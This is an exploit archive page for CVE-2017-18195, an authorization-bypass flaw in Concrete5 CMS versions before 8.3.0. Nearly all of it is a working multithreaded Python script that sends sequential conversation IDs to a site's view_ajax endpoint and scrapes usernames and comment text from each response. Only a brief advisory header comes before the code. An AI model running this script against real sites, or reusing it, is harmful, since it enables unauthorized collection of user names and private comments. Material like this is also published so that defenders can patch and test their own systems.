exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Concrete5 Username / Comments Enumeration

Concrete5 Username / Comments Enumeration
Posted Feb 27, 2018
Authored by Chapman Schleiss

Concrete5 versions prior to 8.3.0 suffers from enumeration vulnerabilities.

tags | exploit, vulnerability
advisories | CVE-2017-18195
SHA-256 | fb841081833ce7bda90f4c30fa3ff82541f8aae542692e8b4781a3128b4b6ac7

Concrete5 Username / Comments Enumeration

Change Mirror Download
#!/usr/bin/env python3

# Concrete5 < 8.3 vulnerable to Authorization Bypass Through User-Controlled Key (IDOR)
# CVE-2017-18195
# Chapman (R3naissance) Schleiss

from queue import Queue
from threading import Thread
from bs4 import BeautifulSoup
from tabulate import tabulate
import argparse
import requests
import logging

parser = argparse.ArgumentParser(
description="This script attempts to enumerate all comments from a vulnerable Concrete5 CMS.",
)
parser.add_argument('-u','--url', action='store', dest='url', required=True,
help="This is the url to attack. Typically http://example.com/index.php/tools/required/conversations/view_ajax")
parser.add_argument('-s','--start', action='store', type=int, dest='start_id',
help='Where to start enumeration')
parser.add_argument('-e','--end', action='store', type=int, dest='end_id',
help='Where to end enumeration')
parser.add_argument('-v','--verbose', action='store_true', dest='verbose',
help='This boolean flag will trigger all raw information to stdout')
args = parser.parse_args()

if args.verbose:
logging.basicConfig(level=logging.DEBUG, format='[%(levelname)s] - %(threadName)s - %(message)s')
else:
logging.basicConfig(level=logging.INFO, format='[%(levelname)s] %(message)s')

if args.start_id is None:
args.start_id = 1
if args.end_id is None:
args.end_id = 10

def crawl(q, result):
while not q.empty():
work = q.get()
logging.debug("Requesting cnvID: " + str(work))
try:
response = requests.post(args.url, data={'cnvID': work, 'cID': 1}, timeout=300)
logging.debug("Requested cnvID: %s [%s]", str(work), str(response.status_code))
if response.status_code < 400 or response.status_code > 499:
logging.debug("Parsing html and adding comments to results list")
soup = BeautifulSoup(response.text, 'html.parser')
username = soup.find_all('span', {'class': 'ccm-conversation-message-username'})
message = soup.find_all('div', {'class': 'ccm-conversation-message-body'})
for i in range(len(username)):
results.append((work, username[i].text.strip(), message[i].text.strip()))
logging.info("Completed cnvID: " + str(work))
except:
logging.error('Error getting cnvID: ' + str(work))
q.task_done()
return True

q = Queue(maxsize=0)

enum = range(args.start_id, args.end_id + 1)
num_theads = min(50, len(enum))

results = []
for i in enum:
q.put(i)

for i in range(num_theads):
logging.debug('Starting thread ' + str(i))
worker = Thread(target=crawl, args=(q, results), name="Thread: " + str(i))
worker.setDaemon(True)
worker.start()

logging.debug('Waiting for final threads to complete')
q.join()

logging.info('Enumeration complete')

print(tabulate(results, headers=('cnvID', 'username', 'message'), tablefmt='grid'))


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close